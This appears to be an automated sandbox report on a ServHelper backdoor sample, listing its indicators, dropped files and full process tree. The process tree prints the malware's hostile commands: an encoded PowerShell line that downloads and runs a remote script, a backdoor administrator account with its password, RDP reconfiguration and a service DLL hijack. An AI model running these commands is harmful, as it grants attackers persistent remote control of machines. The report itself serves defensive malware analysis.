Analysis

  • max time kernel
    143s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-04-2024 13:01

General

  • Target

    a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe

  • Size

    6.8MB

  • MD5

    d088405edcf61c7fb54b260bc6315a31

  • SHA1

    997f482fcca4cc5704bb0bf8b47132dd34aa0a37

  • SHA256

    a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41

  • SHA512

    1bc794a0c84525d67b8a3aecdd4544942cced8996f0b04fa8da1649a14fdd746638ba87b850c3046a3e82c1a455c2168802fe85b45b86436ca2515885e7bb86c

  • SSDEEP

    98304:q7WKfdq7RyQdh/ha7TTOzAElMLmZ7oo8kTApKGaRqc4O1XujlqScYEYrsG3AH:qCUdcRwfTTLmxoQT7RRq4ujltcYN9w

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 7 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 18 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe
    "C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3352
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES94CE.tmp" "c:\Users\Admin\AppData\Local\Temp\0qffd0uq\CSCC28D76AEF0B9439CA13729E6FCF9B6F.TMP"
          4⤵
            PID:4740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3180
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4768
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1144
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3040
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2416
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2604
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2768
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2412
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1692
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3932
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4224
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2560
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Sets DLL path for service in the registry
            • Modifies registry key
            PID:2212
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1228
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3344
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2312
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5056
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1996
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2804
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:4740
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5096
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3052
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1184
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:2536
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:5108
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:4896
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1476
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc Ghasar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3576
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                        3⤵
                          PID:2276
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc UbkT2IKN /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3784
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc UbkT2IKN /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3752
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc UbkT2IKN /add
                          3⤵
                            PID:5008
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2408
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                            PID:2932
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                              3⤵
                                PID:1436
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
                            1⤵
                              PID:5108
                              • C:\Windows\system32\net.exe
                                net.exe LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
                                2⤵
                                  PID:2460
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
                                    3⤵
                                      PID:4016
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                  1⤵
                                    PID:1512
                                    • C:\Windows\system32\net.exe
                                      net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                      2⤵
                                        PID:2328
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                          3⤵
                                            PID:4996
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe user WgaUtilAcc UbkT2IKN
                                        1⤵
                                          PID:1832
                                          • C:\Windows\system32\net.exe
                                            net.exe user WgaUtilAcc UbkT2IKN
                                            2⤵
                                              PID:5004
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user WgaUtilAcc UbkT2IKN
                                                3⤵
                                                  PID:3792
                                            • C:\Windows\System32\cmd.exe
                                              cmd.exe /C wmic path win32_VideoController get name
                                              1⤵
                                                PID:3180
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic path win32_VideoController get name
                                                  2⤵
                                                  • Detects videocard installed
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4300
                                              • C:\Windows\System32\cmd.exe
                                                cmd.exe /C wmic CPU get NAME
                                                1⤵
                                                  PID:2672
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic CPU get NAME
                                                    2⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:432
                                                • C:\Windows\System32\cmd.exe
                                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                  1⤵
                                                    PID:3948
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                      2⤵
                                                        PID:2988
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                          3⤵
                                                          • Blocklisted process makes network request
                                                          • Drops file in Program Files directory
                                                          • Drops file in Windows directory
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4400

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.dll

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      665b3685e29fe119623979ab36107f85

                                                      SHA1

                                                      0ef83eba63a9d569d5354ce6be017f70080ef433

                                                      SHA256

                                                      480db873f3fa57ed91ca0cb4a4d69fb8fc7a86543d9896c3939df4b2670991dc

                                                      SHA512

                                                      c8b230feece66ec5052850b0073179d1bbb16dae193b33864386fdf27740690392523a5e173cfe224524c9ea4020e13b583192f0f10489106f3c6ae35610b53d

                                                    • C:\Users\Admin\AppData\Local\Temp\RES94CE.tmp

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      d357c066adb45598f2debee882e0085a

                                                      SHA1

                                                      608d9425f18168e6c928ee4e1d40a58e8e98b38d

                                                      SHA256

                                                      1e024096de5adb138a02218549ba8c333a0d464f8899e1581fa70af786383c7f

                                                      SHA512

                                                      e48c46e9d7eb4a78f4cdf01aa369d175c0e3bf2ceb8896b0d211505df9294d41a37ef36aa169d8f39983ce0296680c92670f16e17abe8ca0f097eade62d8f5ac

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orlfxsph.yo4.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                                                      Filesize

                                                      2.5MB

                                                      MD5

                                                      5db5ffa607b5b5ca17bfd6fb78403660

                                                      SHA1

                                                      1e793958cb1dd1dc99da4a50beaa2945561b7a16

                                                      SHA256

                                                      1fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89

                                                      SHA512

                                                      3d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43

                                                    • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      28d9755addec05c0b24cca50dfe3a92b

                                                      SHA1

                                                      7d3156f11c7a7fb60d29809caf93101de2681aa3

                                                      SHA256

                                                      abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                                      SHA512

                                                      891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                                    • C:\Windows\Branding\mediasrv.png

                                                      Filesize

                                                      60KB

                                                      MD5

                                                      96e498a3833f52ae46bcfdc391f73cf7

                                                      SHA1

                                                      ecaf72b46cf1cb074bde2914963bb1e61450ca95

                                                      SHA256

                                                      21a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b

                                                      SHA512

                                                      9f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540

                                                    • C:\Windows\Branding\mediasvc.png

                                                      Filesize

                                                      743KB

                                                      MD5

                                                      2ee3d03bb1f8bd257235fc70e92b17e1

                                                      SHA1

                                                      c36482b8f8229578dec1cc687aaf53084cb6d05e

                                                      SHA256

                                                      b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0

                                                      SHA512

                                                      39f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea

                                                    • C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE416.tmp

                                                      Filesize

                                                      24KB

                                                      MD5

                                                      d0e162c0bd0629323ebb1ed88df890d6

                                                      SHA1

                                                      cf3fd2652cdb6ff86d1df215977454390ed4d7bc

                                                      SHA256

                                                      3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

                                                      SHA512

                                                      a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

                                                    • C:\Windows\system32\rfxvmt.dll

                                                      Filesize

                                                      40KB

                                                      MD5

                                                      dc39d23e4c0e681fad7a3e1342a2843c

                                                      SHA1

                                                      58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                      SHA256

                                                      6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                      SHA512

                                                      5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                    • \??\PIPE\lsarpc

                                                      MD5

                                                      d41d8cd98f00b204e9800998ecf8427e

                                                      SHA1

                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                      SHA256

                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                      SHA512

                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.0.cs

                                                      Filesize

                                                      424B

                                                      MD5

                                                      9f8ab7eb0ab21443a2fe06dab341510e

                                                      SHA1

                                                      2b88b3116a79e48bab7114e18c9b9674e8a52165

                                                      SHA256

                                                      e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                                      SHA512

                                                      53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.cmdline

                                                      Filesize

                                                      369B

                                                      MD5

                                                      6ae66e20610b777e02b43504b820bb78

                                                      SHA1

                                                      8d50a05e429f0d6d26f67e4986d3ca29d3ec2a70

                                                      SHA256

                                                      bf4ad093068496363288005aa16e87b52bfce14b8c3dfc41a80c7e840112fc7d

                                                      SHA512

                                                      8d41e84b1bed309eeb9665374a453ed3d093e1daa24e0d631d89da0a73ea105a9785c6d76bea7a51d2cfe5dc2da70d7ec3b50c1fbe9400244d66ce183d8ff37d

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0qffd0uq\CSCC28D76AEF0B9439CA13729E6FCF9B6F.TMP

                                                      Filesize

                                                      652B

                                                      MD5

                                                      9d81e7fb9e731579b845854c82751375

                                                      SHA1

                                                      6fd00b9c8ef551c6ea5cbbd60dd708ac3850a1d3

                                                      SHA256

                                                      96bdeb6702a5ec92dc7f2b210e3fffd2e445b29c07c8796836e5288a647e1bdb

                                                      SHA512

                                                      f7a4a5b7ae30958a0a47459a0ac31cd5784dbc13e006801048bb5e8e23874a3063cec6b8ebe617b42e1e9a37944f53197b55f18adbe954a3aae74932a342f8a1

                                                    • memory/228-167-0x00000240BEAE0000-0x00000240BEC89000-memory.dmp

                                                      Filesize

                                                      1.7MB

                                                    • memory/228-5-0x00000240BE6E0000-0x00000240BEAE4000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                    • memory/228-168-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/228-9-0x00000240FFC80000-0x00000240FFC90000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/228-7-0x00000240FFC80000-0x00000240FFC90000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/228-6-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/228-8-0x00000240FFC80000-0x00000240FFC90000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/228-56-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/228-43-0x00000240BEAE0000-0x00000240BEC89000-memory.dmp

                                                      Filesize

                                                      1.7MB

                                                    • memory/228-0-0x00000000004A0000-0x00000000012F7000-memory.dmp

                                                      Filesize

                                                      14.3MB

                                                    • memory/1144-89-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/1144-88-0x0000025B797F0000-0x0000025B79800000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1144-83-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/1144-86-0x0000025B797F0000-0x0000025B79800000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1144-84-0x0000025B797F0000-0x0000025B79800000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-91-0x00007FFC58E10000-0x00007FFC58E29000-memory.dmp

                                                      Filesize

                                                      100KB

                                                    • memory/1828-93-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-12-0x000002074CAC0000-0x000002074CAE2000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/1828-13-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/1828-165-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/1828-164-0x00007FFC58E10000-0x00007FFC58E29000-memory.dmp

                                                      Filesize

                                                      100KB

                                                    • memory/1828-160-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-14-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-85-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/1828-15-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-87-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-25-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-39-0x0000020734880000-0x0000020734888000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/1828-90-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1828-44-0x000002074D3B0000-0x000002074D5BA000-memory.dmp

                                                      Filesize

                                                      2.0MB

                                                    • memory/1828-42-0x000002074D020000-0x000002074D196000-memory.dmp

                                                      Filesize

                                                      1.5MB

                                                    • memory/1828-94-0x000002074CAB0000-0x000002074CAC0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/3180-58-0x0000020A9D700000-0x0000020A9D710000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/3180-54-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/3180-55-0x0000020A9D700000-0x0000020A9D710000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/3180-57-0x0000020A9D700000-0x0000020A9D710000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/3180-59-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4400-114-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4400-115-0x0000020A93300000-0x0000020A93310000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4400-158-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4768-60-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4768-73-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4768-72-0x00000249AF8B0000-0x00000249AF8C0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4768-62-0x00000249AF8B0000-0x00000249AF8C0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4768-61-0x00000249AF8B0000-0x00000249AF8C0000-memory.dmp

                                                      Filesize

                                                      64KB